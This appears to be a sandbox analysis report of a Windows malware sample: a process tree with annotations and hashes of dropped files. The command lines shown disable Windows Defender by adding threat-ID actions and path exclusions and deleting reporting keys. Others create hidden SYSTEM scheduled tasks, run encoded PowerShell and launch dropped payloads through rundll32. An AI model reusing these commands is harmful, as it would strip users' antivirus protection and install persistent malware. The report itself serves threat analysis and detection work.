6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4624
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:8
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2508
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QxhTRhBLgDrU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QxhTRhBLgDrU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TloWHzQxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TloWHzQxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eSoSRLDipKupC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eSoSRLDipKupC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wqPaCWxmyWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wqPaCWxmyWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zopNtCPofqZRshxFhVR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zopNtCPofqZRshxFhVR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MIOQmlFchkRGycVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MIOQmlFchkRGycVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\erSyCIiXgZXqUzOL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\erSyCIiXgZXqUzOL\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3800 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QxhTRhBLgDrU2" /t REG_DWORD /d 0 /reg:323⤵PID:4608
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QxhTRhBLgDrU2" /t REG_DWORD /d 0 /reg:324⤵PID:3468
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QxhTRhBLgDrU2" /t REG_DWORD /d 0 /reg:643⤵PID:5024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TloWHzQxU" /t REG_DWORD /d 0 /reg:323⤵PID:528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TloWHzQxU" /t REG_DWORD /d 0 /reg:643⤵PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSoSRLDipKupC" /t REG_DWORD /d 0 /reg:323⤵PID:4212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSoSRLDipKupC" /t REG_DWORD /d 0 /reg:643⤵PID:2752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqPaCWxmyWUn" /t REG_DWORD /d 0 /reg:323⤵PID:2112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqPaCWxmyWUn" /t REG_DWORD /d 0 /reg:643⤵PID:1940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zopNtCPofqZRshxFhVR" /t REG_DWORD /d 0 /reg:323⤵PID:4704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zopNtCPofqZRshxFhVR" /t REG_DWORD /d 0 /reg:643⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MIOQmlFchkRGycVB /t REG_DWORD /d 0 /reg:323⤵PID:4448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MIOQmlFchkRGycVB /t REG_DWORD /d 0 /reg:643⤵PID:636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL /t REG_DWORD /d 0 /reg:323⤵PID:4208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL /t REG_DWORD /d 0 /reg:643⤵PID:4376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\erSyCIiXgZXqUzOL /t REG_DWORD /d 0 /reg:323⤵PID:4536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\erSyCIiXgZXqUzOL /t REG_DWORD /d 0 /reg:643⤵PID:3944
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFgFGXqDi" /SC once /ST 06:21:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFgFGXqDi"2⤵PID:3192
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFgFGXqDi"2⤵PID:3692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jAPQkthTMSklmsWLq" /SC once /ST 02:36:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\erSyCIiXgZXqUzOL\GVSABzKakgckLNM\jCjqzOv.exe\" 4P /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jAPQkthTMSklmsWLq"2⤵PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4220 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3136
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3208
-
C:\Windows\Temp\erSyCIiXgZXqUzOL\GVSABzKakgckLNM\jCjqzOv.exeC:\Windows\Temp\erSyCIiXgZXqUzOL\GVSABzKakgckLNM\jCjqzOv.exe 4P /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4808 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhiKLDYYmOVJYRnmNA"2⤵PID:4908
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:740
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:5076
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2784
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TloWHzQxU\XqhRjT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rSkSwYHQOxYzETV" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:8
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rSkSwYHQOxYzETV2" /F /xml "C:\Program Files (x86)\TloWHzQxU\yUcksdc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rSkSwYHQOxYzETV"2⤵PID:3512
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rSkSwYHQOxYzETV"2⤵PID:3044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GdxfyAawfiNbBt" /F /xml "C:\Program Files (x86)\QxhTRhBLgDrU2\IZIGPxF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OxFcncghDbRjM2" /F /xml "C:\ProgramData\MIOQmlFchkRGycVB\OmEXqNH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ktKVYLJneUOMgXpHm2" /F /xml "C:\Program Files (x86)\zopNtCPofqZRshxFhVR\BmWqhNg.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uEWnBcEBihOfoSaLKpA2" /F /xml "C:\Program Files (x86)\eSoSRLDipKupC\OzLzsDs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lCFTjNOFEcSKwrIvx" /SC once /ST 15:30:07 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\erSyCIiXgZXqUzOL\GvNXXYsR\zTerrrC.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "lCFTjNOFEcSKwrIvx"2⤵PID:1672
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2920
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4992
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2964
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jAPQkthTMSklmsWLq"2⤵PID:2276
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\erSyCIiXgZXqUzOL\GvNXXYsR\zTerrrC.dll",#1 /site_id 5254031⤵PID:3436
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\erSyCIiXgZXqUzOL\GvNXXYsR\zTerrrC.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4752 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lCFTjNOFEcSKwrIvx"3⤵PID:1812
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5abcfce95df756779b78b19b5c9bf7c86
SHA114d899ffe387bf0731af008233c887a7a94add7c
SHA2560e2ee91542f9bdc0718912932f6f05e33e4be4db3e42f52a8af5aadead801804
SHA512a9ae15be6f40cd8c5e820221fd8871fa00f36e6dc744d4b7b8c00a4920540270d3c3853a3d206016f4c946f2df9466c3759e60b8e93878ed0d42b5e43184bdb1
-
Filesize
2KB
MD517fa39b19a0729638880c7bfcd5c5e2a
SHA1fdc4442f24da81f1d612e689ac941eee3fc0135b
SHA256e2a5a9b9f9a2a01375d861b41bb30a08320052cc2c1c18558bb973d4351ab817
SHA512f1685f8095993d1e1fbb8c9a93d2acbe3e9a2787300787c87bd6a1142b7b67f9563a4a050713ba83207e60d9811cd259061267fed1fc75aa89be2a424c5712e6
-
Filesize
2KB
MD589c6272a5a07d8151d3986eaeaa9f7b7
SHA15234c0e88aa0524733f96234653427ea4bcc2dde
SHA256c1575be15e96eaecfd18cc4899a3d8be2403190f83b72ee6def577466518e2c9
SHA5125f513db804de8b8699b470757c8ffb7f471e77dc287b5aa97c276b8761732c51b0cbba093e7565638b494ab433fe71c338bc15fa7a2354482619a826285a2cca
-
Filesize
2KB
MD58b27688490ee047b5fa3d9fb7f22004d
SHA186e794ce5fe5cd65883e9ae147e88b6559ae5838
SHA256aefe2a769b1eb83995bf92e101cd4919f534b6ce9d22ba77ac8a90d29aa050f7
SHA51209b17a48db4e89c9aea5e404cb60af8fdf88b2bc2ef2b7a7dfd385dc3b6db245798c8e219f60f8bc704f42bfab7833099c42714de3905519f8a0645584e7ada7
-
Filesize
2KB
MD5ed74bc35e2ce6093f22038645d39176d
SHA18fa17819b2f10f345fe5aba6369cc31f6ac28254
SHA256ac0f9e433d1aa3905951d5b95f65060f40d97030cd37175e508c3d99adf84548
SHA51208e3f3fe9acc5ca8fd72f50ae139feb4bed4f4b635bb2d278284fab6295949c14abfa80415a57bc0729ab11a7a83ab4ca1a10551f3f9e0ea4bbae9550210d023
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
6.3MB
MD5728c0388d9aff9b5cb072def95e4a299
SHA13cca2d989aaadb7ec35646d520c9e6cf7bcb0462
SHA256f5fb82aca47de1e459af772ca77c18661d5715fafce0f253737f23bf6cd2e928
SHA5123f5ec24f1e138beebe46ca9a2b1e571eeb45f795bc3b99aa870a13cd649f7bbcfa957fe3bb68acbc53ed37dc6febea3b43db3d7664ddcd46dce519694d7e7cf3
-
Filesize
6.3MB
MD5728c0388d9aff9b5cb072def95e4a299
SHA13cca2d989aaadb7ec35646d520c9e6cf7bcb0462
SHA256f5fb82aca47de1e459af772ca77c18661d5715fafce0f253737f23bf6cd2e928
SHA5123f5ec24f1e138beebe46ca9a2b1e571eeb45f795bc3b99aa870a13cd649f7bbcfa957fe3bb68acbc53ed37dc6febea3b43db3d7664ddcd46dce519694d7e7cf3
-
Filesize
6.8MB
MD5be44018f2269cdb15799fe61e44abddd
SHA1498acd4eadf3bf1e86f7a3ab149f1d88e12ccfcc
SHA25656305452a438663defcc42a48267b724e40f1a2b291366582f2abe672d1128b5
SHA512d91d6cf055ed7f505727c98cd3e1d1474dcdfdb472b64f58880c4f12fde39f0620487509781dd69912667928c7d089489c9df5a752d114ce9258e28a5ce2c38f
-
Filesize
6.8MB
MD5be44018f2269cdb15799fe61e44abddd
SHA1498acd4eadf3bf1e86f7a3ab149f1d88e12ccfcc
SHA25656305452a438663defcc42a48267b724e40f1a2b291366582f2abe672d1128b5
